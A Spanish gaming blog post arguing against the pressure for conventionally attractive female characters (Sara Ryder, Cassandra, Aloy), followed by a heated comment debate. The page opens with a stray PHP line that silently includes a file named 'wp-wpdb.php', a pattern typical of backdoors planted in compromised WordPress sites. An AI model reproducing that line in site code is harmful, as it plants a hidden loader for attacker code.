if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); La obligación de crear personajes femeninos atractivos – La Fortaleza de LeChuck

La obligación de crear personajes femeninos atractivos

Las redes sociales se han convertido en un campo de minas. Cada día intentas esquivar la estupidez humana pero a veces te golpea salvajemente. Esta semana me llegaba la noticia de la versión «mejorada» que un usuario anónimo ha realizado de Sara Ryder y, más tarde, me topé con una discusión en Steam por un retrato poco atractivo de un juego isométrico. Por si eso fuera poco, la crítica a Aloy por anticarismática y hombre cerraba la semana. Estas pataletas rompieron mi estado zen y reflotaron una pregunta que ronda por mi cabeza desde hace años: ¿Por qué existe esa persistente obligación de crear personajes perfectos y bellos? Esa búsqueda se agudiza en los personajes femeninos, que si no llegan a ciertos cánones, la indignación explota. Viajemos al cretáceo para estudiar estos casos.

Desde tiempos inmemoriales, estamos acostumbrados a ver féminas bonitas, exuberantes y con curvas en los videojuegos. Antiguamente, las portadas de los juegos y el material promocional contenía a la tiarrona de turno como reclamo para el videojugador. Más tarde, con el avance tecnológico, esos artes pasaron a ser personajes poligonados muy atractivos. ¿Recordáis cuando Lara Croft volvía loco al jugador medio con sus melones triangulares? Sin embargo, con el paso del tiempo, diversas compañías han querido romper con esa belleza perfecta impuesta por la sociedad, lo que ha ocasionado el enfado de una gran parte de los jugadores.

Tiran más dos polígonos que dos carretas

Las quejas de la comunidad se centran básicamente en «X personaje es fea» o «ya no quieren hacer chicas guapas». También está el clásico «La culpa es de los SJW, de los hipsters, de Anita, o de mi vecino del quinto o bla, bla, bla». Cualquier grupo al que se le suele cargar el muerto, vaya. No sé cuándo comenzaría todo esto, posiblemente Dragon Age Inquisition fue uno de los detonantes. Meses antes del lanzamiento, mensajes como «todas las tías del juego son feas» incendiaron las redes y los foros oficiales. Los personajes femeninos de Dragon Age Inquisition se salían de los estándares de belleza de tías con curvas de infarto que han acompañado durante años a los juegos de rol en general. No hace falta decir que la mayoría de estos comentarios eran de hombres heterosexuales que soñaban con liarse con un pivón. Del elenco masculino ni se percataron. Bioware quiso desarrollar un grupo heterogéneo de personajes con coherencia hacia sus roles. Cassandra, la experimentada guerrera heterosexual, se llevó bastantes palos al ser corpulenta, tener el pelo corto y portar cicatrices en su rostro. No es la guerrera en bikini, mona y con figura de avispa que solemos ver. Afortunadamente, algunos jugadores que indagaron en su trasfondo la amaron y también entendieron que ese aspecto responde a su personalidad.

Siguiendo con Bioware, Mass Effect Andromeda volvió a levantar comentarios de indignación con la Asari que se mostró en uno de los primeros tráilers. Ciertos fans pidieron a la compañía que la rediseñaran. Poco después pasó algo similar con Sara Ryder. Ambas han sido tachadas de feas y son duramente castigadas en las redes sociales, un espacio donde los individuos se niegan a tolerar que las féminas se alejen de los habituales cánones. Aquí tenéis la «cirugía» que le realizaron a Sara:

Se le ha ido la mano con el botox

Como veis, la diferencia es notable. La primera foto es una ampliación de esta imagen y, posiblemente, no sea su mejor foto, pero el retocador anónimo decidió ponerle rasgos perfectos y tres capas de maquillaje. Si vemos el «character kit» de su hermanito Scott, también difiere de otras imágenes mostradas y podría ponerse en manos del cirujano plástico. Sin embargo, a nadie le importa un pimiento Scott. En ambos casos, lo que podríamos considerar que hace al personaje antinatural (y perturbador) son los ojos (por cierto, ya han actualizado ambos modelos). Por lo demás, son rostros corrientes. Asimismo, esta discusión es absurda sabiendo que habrá un estupendo editor y mods en un futuro.

Pero la gota que colmó el vaso, y que me llevó a escribir este artículo, fue una queja en las discusiones de Steam de Torment: Tides of Numenera. En este RPG isométrico, lo más cerca que vamos a ver al personaje es en un retrato del tamaño de un sello. Ayer anduve buscando nueva información por las discusiones y se mascó la tragedia: me topé con un hilo donde un usuario se quejaba de que la protagonista femenina del retrato es fea. «¡Apaga y vámonos!», me dije. Siempre he querido pensar que en en estos juegos para viejos nostálgicos habría más madurez mental, pero parece que me equivocaba. El problema para esos jugadores es que la chica tiene la cabeza rapada, porque claro, una mujer no se puede rapar la cabeza, y menos tener calvicie. ¡Cómo te atreves a representar a un personaje femenino así, maldito Inxile! Torment tiene una atmósfera oscura e intrigante, por lo que los retratos por defecto de los protagonistas no desentonan. No obstante, en este juego se podrán usar retratos personalizados, como siempre.

No te lo perdonaré jamás, Brian Fargo, ¡JAMÁS!

Cuando publiqué este artículo, me llegaba un nuevo caso, Aloy, la protagonista del inminente Horizon Zero Dawn, era tildada de poco carismática y de hombre en un popular foro. Un usuario abrió un hilo con este mensaje:

Conclusión: Aloy no tiene carisma porque parece un tío. (Aplausos)

Este individuo no era el único que ponía el grito en el cielo, otros foreros opinaban exactamente lo mismo. Aloy es un hombre, fea y no tiene carisma porque no usa maquillaje, viste con un atuendo primitivo y no tiene un precioso cabello Pantenne. Rompe completamente con la imagen femenina que nos lanzan incesantemente los medios y está metida hasta los cimientos de nuestro subconsciente.

Pero que a nadie se le pase por la cabeza algo como «ñiñiñi no quiere personajes buenorros», nada más lejos de la realidad. No hay nada de malo en tener personajes atractivos o de belleza cegadora, el problema viene cuando se convierte en una obligación. En la variedad está el buen gusto, ¿no? Por otro lado, en determinados juegos, un diseño de personajes más «imperfecto» ayuda a la inmersión narrativa, puesto que hacen que la historia sea más creíble.

Cuando leo cosas como las comentadas más arriba, me sorprende la flagrante falta de madurez que demuestra la comunidad, e incluso la industria, la cual se ve obligada a sumirse en los cánones de belleza habituales para no molestar al jugador.

Aún hay mucho camino por recorrer…

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

36 comentarios

  1. Va, venga, el artículo tiene muchas ganas de iniciar flame… vamos a picar.

    >diversas compañías han querido romper con esa belleza perfecta impuesta por la sociedad

    Supongo que aqui toca el tipico «pues no hay ni un videojuego con un tio feo!» de rigor.

    >No hace falta decir que la mayoría de estos comentarios eran de hombres
    heterosexuales que soñaban con liarse con un pivón. Del elenco
    masculino ni se percataron.

    Bonita generalización. Pero bueno, en su momento con Dragon Age Inquisition hubo mucho vinagre. No solo con ellas, también con ellos. No olvidemos ese personaje que sólamente se presentaba como «soy gay». Como si fuera algo super importante. En cualquier caso… el problema de «fealdad» de Dragon Age Inquisition no se llama Cassandra. Se llama Sera. Haces un juego de fantasía épica, con unos estandares y reglas harto conocidos, como por ejemplo, los elfos son la cosa más perfecta del universo. Tanto que hasta dan asco, y los hay que los adoran, y los odian con fiereza. Y haces ESO. Con una busqueda de «Sera Dragon Age» en google imágenes se verá perfectamente a lo que me refiero.

    No es que sea un hombre heterosexual que soñaba liarme con un pivón. Es que es un personaje que da un asco que te mueres. Y cuando juego a una fantasía, esas fantasías no suelen incluir el ir al lado de un ogro. O controlarlo, dicho sea de paso, retomando eso de que no hay personajes masculinos feos.

    >Mass Effect Andromeda

    Creo que es una cuestión de interpretación lo que comentas aqui… la gente a la que lei «indignarse» con lo de la nueva asari es porque parece un hombre… cuando por las propias normas de Bioware, las asari son monogénero, y para colmo, tienen la habilidad de parecer los seres mas bellos del universo, independientemente de la raza que las mire, como si de un espejo mágico se tratasen. Y entonces aparece esa asari que parece un hombre, bastante parecido además a Shrek.

    Las criticas por Ryder no eran por fea. Eran por la malísima calidad de las animaciones. La famosa escena en la que haciendo un nudo con las manos desarma al enemigo, y con una cara muerta y una sonrisa vacía apuntas a tu enemigo. Esas bocas que hacen que parezcan cascanueces.

    Pero no, supongo que lo facil es coger una imagen que ha empezado a aparecer hace una semana por 4chan, hecha a modo de broma, remarcando el poco presupuesto que parecen tener para hacer un modelo que no parezca un muñeco, y decir que es que a la gente le parece fea. Ya que nos ponemos, se podría poner también la imagen que compara al chico con Shephard, y que lleva a la conclusión de uqe somos un retaco deforme de metro y medio.

    De Torment no comento, porque este artículo es el primero que leo que se mete con ese juego por ese motivo.

    >En la variedad está el buen gusto, ¿no?

    Teniendo en cuenta que no considero que la «indignación» se deba a que sean feas… no es que sea que en la variedad esté el gusto. Es que se esperan unos minimos. Se espera que en una franquicia que, en su dia, se decía que era más importante que Star Wars, se cuide el detalle de que los krogan se reproduzcan siempre por el mismo método, y no varíe según el guionista que escriba. Que si se establece que las asari son los elfos del futuro, que así sea. Que si vas a hacerme un juego de elfos, que así sea. Que si vas a sacarme un nuevo juego en nueva generación, no parezca una cutrada sin vida.

    Además, es curioso ver que las quejas son de mundos establecidos, o que se basan en reglas ya conocidas. No veo referencias a Dishonored, por ejemplo, con todos sus personajes gorilescoso yonkarros. Que son fantásticos, y le da un aspecto único al mundo del juego. Pero supongo que no cuadra con eso de que a nadie le gustan los juegos con feas…

    1. Veamos, romper con lo establecido como lo ha hecho Dragon Age Inquisition en algunos aspectos no parece que te guste. Sera, en tu opinión, es fea, y aún así, ¿qué importa? Derrocha carisma. También tenemos al elfo Solas, está calvo, no es un tiarrón, ¿y qué? No voy a llorar por los foros, ya que es mucho más que una apariencia. Tanto el bando masculino como el femenino tiene personajes corrientes, ninguno destaca especialmente a primera vista. Lo importante es que son personajes interesantes y con un buen trasfondo. No es una pasarela de modelos perfectos para cumplir con las fantasías de alguien, para eso hay otros materiales por ahí.

      Defiendes que los elfos y las asaris han de ser atractivos porque tú quieres y porque siempre han sido y han de permanecer así. Querido mío, el mundo y el arte evoluciona, gracias a dios. Son muchos años creando la belleza perfecta, queremos también personajes creíbles, imperfectos y que se salgan de los estándares. Gente corriente.

      Lo que comentas de la mueca de Ryder, es un glitch, salió explicado en diferentes medios. Lo curioso de la «broma» con la comparativa de Ryder, es que las hostias van para ella, no para él. Ella ha de ser guapa y vamos a hacerla a nuestro gusto. Además, esa broma provocó la indignación de individuos que querían la tía buena de turno.

          1. Pues no se que habrá pasado. Mi comentario estaba. Después lo he editado para añadir que habia recordado que pasó lo mismo con el Monkey Island remasterizado en su dia… y lo siguiente es que habia volado 🙁

            En fin, solo remarcaba lo qeu decia en el primer comentario, que cuando hay reglas establecidas, esta feo pasarselas por el arco del triunfo. Por eso importa que Sera sea fea y que haya una asari que parece un hombre. Si el comentario está pendiente de moderación, lo mismo puedes recuperarlo.

          2. Como he comentado arriba, Sera no me parece fea, y Peebee mucho menos un hombre. Se escaparán de los cánones establecidos, pero romper con ellos es necesario para lograr la evolución. La belleza es relativa, y remarco otra vez la necesidad de crear personajes dispares para dar riqueza a la narrativa.

      1. Que se pasan las reglas preestablecidas del mundo en el que ambientan, y lo mandan todo al garete. Vamos, como si vieras a un viejo hacer de niño en el teatro, o un cuadro de Jesucristo con facciones incas.

        1. Romper con lo establecido hace que surjan historias y géneros maravillosos. No lo olvides.
          Como te he dicho por Twitter, deberías jugar a Dragon Age Inquisition y así disfrutarías de la singularidad de Sera.

          1. Ser diferente, único o extraordinario no te convierte automáticamente en útil y maravilloso. No lo olvides tú tampoco.

            Por cierto, visto las ultimas imagenes soltadas por Bioware en Twitter… para mi que dan la razón en que los personajes de ME Andromeda requieren un poquito más de trabajo y pulido. Y a un mes del lanzamiento, eso me da miedo 🙁

          2. No sabia que hubiese gente a la que le gustase Sera xD

            Me ha hecho especial gracia lo del Jesucristo con facciones incas cuando tenemos un Jesucristo BLANCO PURO en toda la cultura moderna XD

      1. Está establecido en el punto y hora que es un juego de rol de fantasía épica que sigue el imaginario establecido con obras como el Señor de los Anillos.

        Pero si, que los elfos sean putos orcos desde el 1 es otro detalle más de por qué Dragon Age es tremendamente disonante con dicho imaginario.

        1. Ah, pero que te crees que los elfos los invento Tolkien? Que mono.

          Y ya como Tolkien dijo que los elfos eran bellos en la Tierra Media, el resto de universos de fantasia son asi POR COJONES, no?

          Venga, va

          1. Ah, pero te crees que en la era contemporánea lo que se entiende como elfo es esa criatura deforme y lasciva del folclore alemán? Que mono.

            Y ya como te apetece obviar la realidad, el resto de universos de fantasía épica son como tu digas POR COJONES, no?

            Venga, va

          2. Wow, que ingenioso, me has dejado sin respuesta! Ah, espera. No.

            Lastima que para hacer la gracia de imitarme hayas sacrificado toda la coherencia de lo que escribes. Me mola especialmente lo de «obviar la realidad» hablando de fantasia epica. JAJ.

            Si mañana a alguien le luce escribir un libro de fantasia donde los dragones son mamiferos y no existen los perros, tu opinion de lo que es un Dragon o los canones de Tolkien van a dar bastante igual.

            Resulta que ni los elfos ni los dragones alados existen. La imagen que tu o cualquiera tenga de ellos es absolutamente irrelevante. Get over it.

          3. No debería seguir, porque es obvio que eres un troll de medio pelo y deberías buscarte una afición, pero…

            >Me mola especialmente lo de «obviar la realidad» hablando de fantasia epica
            Claro, es taaaaaan absurdo hablar del imaginario popular y qué entiende la gente por un término cuando se habla de fantasía épica… si es que, ¡a quien se le ocurre!

            >tu opinion de lo que es un Dragon o los canones de Tolkien van a dar bastante igual.
            No es «mi» opinión, es algo establecido ya en el subconsciente común. Cualquiera puede escribir sobre lo que le de la gana, y hacerlo totalmente a contracorriente de lo que la sociedad tiene preestablecido sobre ciertas ideas. Y por supuesto, la mayoría fracasan en un nivel profesional, si bien algunos consiguen un gran exito comercial. Por ejemplo, ¿alguien considera a Stephenie Meyer un premio Planeta? Puedes coger algo que ya existe, pasartelo por el forro (como decía en uno de los comentarios eliminados), pero eso lo que suele provocar es enajenamiento y disgusto. Ya lo decía Lope de Vega en su Arte nuevo de hacer comedias. Si hablare el rey, imite cuanto pueda la gravedad real; si el viejo hablare, procure una modestia sentenciosa. Parafraseando, si vas a venderme un mundo de fantasía con elfos, no me pongas esos engendros.

            >Resulta que ni los elfos ni los dragones alados existen. La imagen que
            tu o cualquiera tenga de ellos es absolutamente irrelevante. Get over
            it.

            Ni Cristo, ni el Espiritu Santo existen. La imagen que tú o cualquiera de tenga de ellos es absolutamente irrelevante. Get over it.

            A ver si esa frase no te chirría ni siquiera un poquito.

            PD: creo que es obvio que mi contestación te ha molestado. Por eso me he limitado a reflejar tu respuesta, para que veas en un espejo lo que . Deberías reflexionar sobre ello la próxima vez que te aburras y te pongas a teclear furiosamente 🙂

          4. Molestia ninguna, es un tema más que interesante. La única pega es el tema de los argumentos de parvulario, pero vamos, tan rebien.

            Y no, la frase de Cristo o el espíritu Santo no me chirría, resulta que el chaval blanco no era, y fíjate que en el medievo ya se pasaron por el forro tu argumento y fueron a contracorriente. Y no les ha ido mal.

            Si Tolkien hubiese seguido tus limitaciones no hubiera cambiado lo que hoy entendemos como un elfo de fantasía. Precisamente las concepciones que defiendes a capa y espada fueron un día una rareza o innovación. Si hubieses sido contemporáneo de Tolkien estarías echando pestes en su dirección en lugar de hacia BioWare. Da para alguna que otra carcajada.

            Imagino que the Walking Dead o 28 días después te parecen aberraciones… Los zombies son muertos vivientes que salen de tumbas y comen cerebros! Como se atreven!? Entrevista con el vampiro se merece la muerte, los vampiros viven en castillos y llevan capa!
            Batman no matando a gente? Pero si los mataba al principio! El Joker de El caballero oscuro es una mierda, esta preestablecido en nuestra cultura que el Joker siempre se ríe!! Blasfemia!!

            Igual eres tú el que tiene que reflexionar. Insisto, argumentos de parvulario.

          5. Argumentos de parvulario. El que ha perdido la razón por descalificar desde un primer momento. Venga, chaval, felicidades. Tu la tienes más gorda.

          6. Lo primero, que incluso aunque hubiese descalificado no invalida mis argumentos. Segundo, estoy atacando tu argumentacion, no a ti. Decir que lo que defiendes es una tonteria es diferente a llamarte tonto. He hecho lo primero, no lo segundo.

          7. mirate los elfos de skyrim y daras gracias por los elfos de Dragon Age, si supieras un poco de esto sabrias que no se parecen en nada los elfos de warhammer con los de tolkien, con los de skyrim y los de dragon age, cada uno tiene su propia mitologia y no tienen nada que ver unos con otros

    2. En Dragon Age no hay ningún personaje que se presente como «Soy Gay», es obvio que esto lo has leido en un foro anti bioware y no lo has jugado, o no has prestado atención, porque yo lo he jugado con todos los DLC y te puedo asegurar que ningún personaje se presenta asi, pese a que sus preferencias sexuales sean descritas o parte de un dialogo al inicio de una conversación. Sera es una elfa de ciudad que nisiquiera se considera elfa a si misma, es una elfa discriminada de un gueto en el que se discrimina a los elfos, en ese geto los elfos son pobres y maltratados y no semidioses como en Tolkien, pero en Tolkien los elfos no tienen ese tipo de background realista sino que son como entes perfectos carentes de debilidades humanas. Por lo tanto la estetica de Sera cumple mejor para su rol que si tuviera una estetica canonica. Sera es una elfa Punk, y como tal a los que nos encanta la cultura Punk pues nos encanta Sera y nos parece el personaje mas molón de Dragon Age, las criticas a Ryder SI ERAN POR FEA, lo de las animaciones solo servia como apoyo al argumento de FEA, nada mas que te vayas a los foros y veras que todas estas protagonistas estan en los mismos posts anti-personajes normales/realistas/feistas. Que algo te de asco no significa que sea artisticamente peor, de hecho hay una corriente artistica que es el feismo y sirve para expresar cosas que solo se pueden ver desde la fealdad, significa que tu eres incapaz de ver el mundo desde este punto de vista. Lo de que la indignación no se debe a que sean feas sino unos minimos es un argumento erroneo, porque para mi Sera y Casandra son bellas por ser musculosas y con estetica punk y no las cambiaria por una estetica Barbie, asi que tus maximos serian mis minimos y viceversa, y es cierto que no se debe a que sean feas, es que para muchos son feas por tener el pelo corto o estetica punk no por sus rasgos fisicos, sino politicos, porque sois incapaces de ver la belleza en lo abstracto, lo nuevo, lo moderno, lo punk, lo contracultural y un largo etc de tipos de belleza que algunos si apreciamos y disfrutamos, si tu quieres jugar a una fantasy en la que todo el mundo es perfecto y luego odiarte a ti mismo cada vez que te mires al espejo ese es tu problema, pero si otros disfrutamos la inmersión a traves del realismo y el feismo de un mundo que es tan feo y real como el mundo real, y tan bello como bella es la realidad aveces, pues dejanos en paz disfrutar de nuestras hermosas fealdades.

  2. En la trilogía original de Mass Effect había una mujer en los 3 capitulos a la que ni siquiera se le veía la cara (Tali) y tenía muchísimos fans. Igualmente en el 2, las mujeres del juego más allá de Miranda(el pibón oficial), eran normales, y nadie se quejó de los diseños porque la realidad es que no parecían plastilina moviendo los labios como Stallone como parecen los del nuevo.

    Por lo demás, también se puso verde a los personajes de FFXV por ser niños bonitos y que parecían los backstreet boys, por lo que no es cierto que exista algún tipo de obligación o presión de hacer personajes atractivos, sino más bien de hacer algo realista y que sea un personaje interesante más allá de que sea negro o lesbiana.

    1. Tali no tuvo problemas, en el caso de ME1 fue Ashley quien se llevó la peor parte.
      Un personaje puede ser realista y no ser especialmente atractivo, pero compañías como Bioware están creando personajes muy diversos y algunos no cumplen con las fantasías de los jugadores y éstos hacen ruido. Especialmente los palos van hacia las chicas.

      No hay ningún tipo de problema con los personajes atractivos, hombres o mujeres,el problema radica cuando no aceptamos que también hayan menos guapos.

  3. Vaya articulo tan bueno que has hecho, lo que comentas respecto a que siempre, SIEMPRE se le achaca a los sjw o a una agenda (???) cuando pasan cosas como estas, me preocupa muchísimo, parece que no queramos diversidad en la ficción, muy triste! Ojala vaya cambiando todo con el tiempo!

    1. Gracias, Kevin! Los yankis siempre recurren a esas expresiones, lo llevo leyendo desde el Gamergate. ¡La agenda! ¡Cómo se me pudo olvidar esa! xD.Parece que hay una parte de la comunidad bastante conservadora que no tolera la diversidad. Ojalá la gente se deje de tonterías superficiales y valore los personajes ricos en contrastes.
      Un saludo.

  4. Joder, si tu mayor problema es que en el foro de uno de los miles de juegos de Steam, encontraste un hilo, de entre los miles que hay, en el que un niño rata se quejaba de que la protagonista «no estaba to wena», quiero una vida como la tuya…

  5. No está mal el artículo. No estaba al tanto de muchas de estas polémicas, pero hay alguna que me cuesta creer. No me creo que a estas alturas alguien se haya quejado de que Cassandra es demasiado robusta cuando todas las mujeres humanas comparten el mismo cuerpo (y están penosamente animadas). Es más, BioWare hace esto en todos sus juegos desde hace tiempo ya.

    Igual lo sano es no meterse en ciertos foros xD

    1. Solo he rescatado algunos de los ejemplos más recientes. El hecho de que Cass tenga aspecto de guerrera implacable con el pelo corto, cicatrices y armadura hasta los dientes no gustó.
      No meterse en algunos foros no hace que desaparezca el problema, además te llega por cualquier lado.
      Saludos.

      1. Lo que quiero decir es que no creo que se haya llorado por Cassandra mas de lo que se pataleo por Avelline en su dia. Avelline era de lejos mas fea, mas masculina y mas enlatada, pero sin embargo era mucho mejor personaje que Cassandra.

        Y si bien no meterse en algunos foros no hace que el problema desaparezca, dar visibilidad a cierta gentuza hace casi mas daño que bien.

        De todas formas en lineas generales estoy de acuerdo con lo que escribes. Mi unico pero es que BioWare a estas alturas se merece los palos que le caigan (o EA), aunque me gustaria que fuese por el nivel general de sus juegos y no por sexismo. Pero es que DAI era un festival de personajes planos…

  6. Chorrada de articulo en la tipica linea de «vamos a criticar a aquellos que quieren jugar con personajes agradables a la vista o sus gustos y no quieren ser parte del super movimiento «progresista» de las mujeres en los videojuegos», en fin, lamentable.

    De todas formas no deja de ser curioso que insistais en quitarles peso a esos «quejicas» diciendo siempre que son 4 gatos, pero oye, como cunden para que todos los «progres de panfleto» en este tema corrais a escribir articulos y entradas de blogs criticandolos, a ver si no van a ser 4 gatos.

  7. En la diversidad está el gusto, si no me gusta tal juego o tal personaje pues cambio y a jugar otra cosa pero mucho videojugadores parecen niños haciendo pataletas pq quieren que x juego se modifique a su gusto habiendo tantas opciones. Que una cosa es criticar o decir una sugerencia y otra incendiar y hacer una guerra virtual. No niego que una protagonista femenina visualmente me llame la atención pero reclamar eso en primer lugar antes que la jugabilidad o la historia… pues mal vamos. Espero que esas «críticas» estén hechas por gente de 15 años o menos ahí se puede entender la inmadurez (porque cada vez gente de menso edad accede a una pc o consola)

Dejar un comentario